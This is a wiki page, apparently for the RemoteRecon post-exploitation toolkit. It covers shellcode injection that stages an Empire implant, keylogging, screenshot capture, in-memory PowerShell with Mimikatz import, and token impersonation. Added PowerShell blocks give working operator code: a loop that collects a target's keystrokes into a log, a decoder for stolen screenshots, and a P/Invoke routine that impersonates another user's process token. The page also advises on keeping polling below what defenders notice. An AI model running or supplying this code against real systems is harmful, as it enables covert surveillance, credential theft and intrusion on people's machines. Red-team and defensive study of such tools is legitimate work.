
Capabilities

Chris Ross edited this page Sep 5, 2017 · 9 revisions

Remote Recon Post-ex Capabilities

Remote Recon provides the more common post-exploitation capabilities: screenshots, keylogging, token impersonation, DLL/shellcode injection, and PowerShell execution. Most of these are well documented and already used in other well-known post-exploitation toolkits, so they are not covered in depth here; this page concentrates on how Remote Recon tasks them and retrieves their output.

All commands and their arguments are stored in the command and args registry values respectively; additional arguments are stored in the run value. Command results are not returned immediately. They are written to the registry on the target and retrieved at the operator's discretion, so a result stays on the host until it is collected.

Process Injection

In this example we inject a shellcode wrapper that stages an Empire implant. Generating the shellcode is out of scope here; if you are interested, check out this project from @monogas.

When the Invoke-ShellcodeInject function is executed, the object returned contains the ComputerName, the command, and its argument (the ProcessId). Retrieving the results only requires the Results switch.

[Screenshot: ShellcodeInject]

[Screenshot: Empire-AgentRcvd]

Keylogging

The Get-Keystrokes and Get-Screenshot functions are executed in a similar fashion. The native library is patched with a keylog or screenshot command and injected into the target process, where it loads the CLR and then loads the RemoteReconKS assembly in memory. Data is returned to RemoteReconCore over named pipes. Once the Get-Keystrokes command has been issued, we can retrieve the results periodically or poll the agent continuously.

[Screenshot: Keylog task]

[Screenshot: Keylog Results]
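Because results sit in the registry until they are collected, the operator side is a retrieval loop. The following is an added example, not RemoteRecon's own code: a generic poll-until-result helper and a keystroke collector that appends each batch to a local log. It assumes the -ComputerName and -Results parameters on Invoke-ShellcodeInject and Get-Keystrokes as shown on this page; $Target, the interval and timeout values are constructed.

```powershell
# Added example (not part of RemoteRecon): poll the registry-backed result store
# through the module's -Results switch until a task's output shows up.
# Assumptions: $Target is the target host; -ComputerName and -Results exist on the
# retrieval cmdlets as described on this page.

function Wait-RemoteReconResult {
    [CmdletBinding()]
    param(
        # One retrieval attempt, e.g. { Invoke-ShellcodeInject -ComputerName $Target -Results }
        [Parameter(Mandatory)] [scriptblock] $Retrieve,
        [int] $IntervalSeconds = 10,
        [int] $TimeoutSeconds  = 300
    )
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)
    do {
        $result = & $Retrieve
        # An empty string or $null means the agent has not written a result yet.
        if ($null -ne $result -and ("$result").Trim().Length -gt 0) {
            return $result
        }
        Start-Sleep -Seconds $IntervalSeconds
    } while ((Get-Date) -lt $deadline)
    Write-Warning "No result from the agent within $TimeoutSeconds seconds"
}

function Receive-KeystrokeLog {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [string] $LogPath,
        [int] $IntervalSeconds = 30,
        [int] $DurationMinutes = 60
    )
    $stopAt = (Get-Date).AddMinutes($DurationMinutes)
    while ((Get-Date) -lt $stopAt) {
        # Each retrieval drains whatever the keylogger wrote since the last one.
        $chunk = Get-Keystrokes -ComputerName $ComputerName -Results
        if ($chunk) {
            $stamp = (Get-Date).ToString('yyyy-MM-dd HH:mm:ss')
            Add-Content -Path $LogPath -Value ("[{0}] {1}" -f $stamp, (($chunk | Out-String).TrimEnd()))
        }
        Start-Sleep -Seconds $IntervalSeconds
    }
}

# Constructed usage:
$Target = 'WS01'
Wait-RemoteReconResult -Retrieve { Invoke-ShellcodeInject -ComputerName $Target -Results }
Get-Keystrokes -ComputerName $Target                       # task the keylogger
Receive-KeystrokeLog -ComputerName $Target -LogPath .\WS01-keys.log -DurationMinutes 30
```

Keep the polling interval modest: every retrieval is a remote registry read against the target, and that traffic is what a defender watching remote registry access will see.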

Screenshot

The Get-Screenshot function follows the same execution path as Get-Keystrokes. When the result is retrieved without the ImageSavePath parameter, the screenshot is returned as a base64-encoded string rather than written to a file.

[Screenshot: screenshot]
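When ImageSavePath is omitted you are left with a base64 string to decode yourself. This added example (not RemoteRecon's code) decodes it, checks the magic bytes so an unexpected blob is not written out with an image extension, and saves the file. It assumes the cmdlet returns the base64 text as a plain string; the 1x1 PNG used as input is constructed so the function can be run without an agent.

```powershell
# Added example (not part of RemoteRecon): turn the base64 string returned by
# Get-Screenshot -Results (no -ImageSavePath) into an image file, sniffing the
# header so the extension matches the real format.
# Assumption: the cmdlet returns the base64 text directly as a string.

function Save-ScreenshotFromBase64 {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Base64,
        [Parameter(Mandatory)] [string] $OutPrefix   # output path without extension
    )
    $bytes = [Convert]::FromBase64String($Base64.Trim())
    if ($bytes.Length -lt 8) { throw "Decoded payload is too short to be an image" }

    # Magic-byte check: refuse to write an unknown blob with an image extension.
    $ext = $null
    if ($bytes[0] -eq 0x89 -and $bytes[1] -eq 0x50 -and $bytes[2] -eq 0x4E -and $bytes[3] -eq 0x47) {
        $ext = 'png'
    } elseif ($bytes[0] -eq 0xFF -and $bytes[1] -eq 0xD8 -and $bytes[2] -eq 0xFF) {
        $ext = 'jpg'
    } elseif ($bytes[0] -eq 0x42 -and $bytes[1] -eq 0x4D) {
        $ext = 'bmp'
    }
    if (-not $ext) {
        $head = ($bytes[0..3] | ForEach-Object { $_.ToString('X2') }) -join ' '
        throw "Unrecognised image header: $head"
    }

    $path = "$OutPrefix.$ext"
    [IO.File]::WriteAllBytes($path, $bytes)   # absolute path expected
    Get-Item $path
}

# Constructed sample input: a 1x1 transparent PNG. On an engagement $b64 would be
# the string returned by Get-Screenshot -ComputerName $Target -Results.
$b64 = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
Save-ScreenshotFromBase64 -Base64 $b64 -OutPrefix (Join-Path $env:TEMP 'rr-screenshot')
```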

PowerShell

The Invoke-PowerShellCmd function executes a PowerShell command through the Runspace classes in the System.Management.Automation.Runspaces namespace, i.e. inside the agent's own process without spawning powershell.exe. This gives the user flexibility in how to complete additional tasks (file transfers, webcam access, microphone access, etc.).

[Screenshot: powershellexecution]

Import PowerShell scripts

Similar to Empire's scriptimport and Cobalt Strike's powershell-import commands, the Import-Script function holds a PowerShell script in memory on the agent. Any function defined in that script is then available to subsequent Invoke-PowerShellCmd calls.

[Screenshot: Powershell-import-mimikatz]

[Screenshot: powershell-mimikatz-cmd]

[Screenshot: powershell-mimikatz]

Token Impersonation

The Invoke-Impersonation function obtains a process token, which is then used to create a new System.Security.Principal.WindowsIdentity object. The new user context is returned as the result. Use the Remove-Token command to revert to the SYSTEM context.

[Screenshot: Token-Impersonation]
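The process-token-to-WindowsIdentity path described above, as an added example that is not RemoteRecon's code. It uses a small P/Invoke shim for OpenProcessToken and the .NET Framework WindowsIdentity.Impersonate/Undo pair (the Undo is the equivalent of Remove-Token). Assumptions: Windows PowerShell 5.1 (Impersonate() is not available on PowerShell 7/.NET Core), an elevated session holding SeDebugPrivilege so another user's process token can be opened, and a constructed target PID taken from an explorer.exe instance.

```powershell
# Added example (not RemoteRecon's code): impersonate the owner of a process token
# via WindowsIdentity and revert. Requires Windows PowerShell 5.1, elevation and
# SeDebugPrivilege; $TargetPid is constructed.

Add-Type -Namespace RRDemo -Name Native -MemberDefinition @'
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@

function Invoke-TokenImpersonationDemo {
    [CmdletBinding()]
    param([Parameter(Mandatory)] [int] $TargetPid)

    # TOKEN_QUERY (0x8) | TOKEN_DUPLICATE (0x2) | TOKEN_IMPERSONATE (0x4): enough for
    # WindowsIdentity to duplicate the token and impersonate it on this thread.
    $access = [uint32](0x8 -bor 0x2 -bor 0x4)
    $token  = [IntPtr]::Zero
    $proc   = Get-Process -Id $TargetPid
    if (-not [RRDemo.Native]::OpenProcessToken($proc.Handle, $access, [ref]$token)) {
        $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "OpenProcessToken failed on pid $TargetPid (Win32 error $err)"
    }
    try {
        $before   = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        $identity = New-Object System.Security.Principal.WindowsIdentity($token)
        $ctx      = $identity.Impersonate()          # this thread now runs as the token's user
        try {
            $during = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        }
        finally {
            $ctx.Undo()                              # revert, as Remove-Token does
        }
        $after = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
        $identity.Dispose()
        [pscustomobject]@{ Before = $before; Impersonated = $during; AfterRevert = $after }
    }
    finally {
        [void][RRDemo.Native]::CloseHandle($token)
    }
}

# Constructed usage: impersonate the owner of an explorer.exe instance.
$TargetPid = (Get-Process explorer | Select-Object -First 1).Id
Invoke-TokenImpersonationDemo -TargetPid $TargetPid
```

Impersonation is per thread, which is why the check of the current identity happens between Impersonate() and Undo(); anything the agent runs on another thread (a separate runspace, for instance) keeps the original context unless it is impersonated there too.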

Remote Recon removal

The Uninstall-RemoteRecon function removes the agent. All registry values under the pre-defined registry path are deleted, starting with the Run value; once that value is gone the agent halts execution. After running it, confirm that no values remain under that path before considering the host clean.